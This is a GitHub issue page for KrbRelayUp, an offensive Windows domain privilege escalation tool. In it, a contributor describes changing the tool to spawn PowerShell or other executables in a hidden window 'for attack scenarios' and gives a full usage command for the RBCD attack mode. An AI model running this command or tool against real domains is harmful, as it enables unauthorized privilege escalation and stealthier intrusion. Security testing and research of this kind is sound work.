Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
1.53k stars 202 forks source link

Customize krbSCM payloads with hidden window #28

Open SnowWhite1129 opened 2 years ago

SnowWhite1129 commented 2 years ago

Original version of KrbRelayUp could only spawn cmd.exe with a new window. I modify the spawn process to make it more pratical in attack scenarios.

Now, it can spawn a powershell or other executable files in bin path like this. ./KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <server_name> -cn <computer_name> -cp <computer_password> -sc "powershell.exe tasklist > C:\Windows\Temp\tasklist.txt"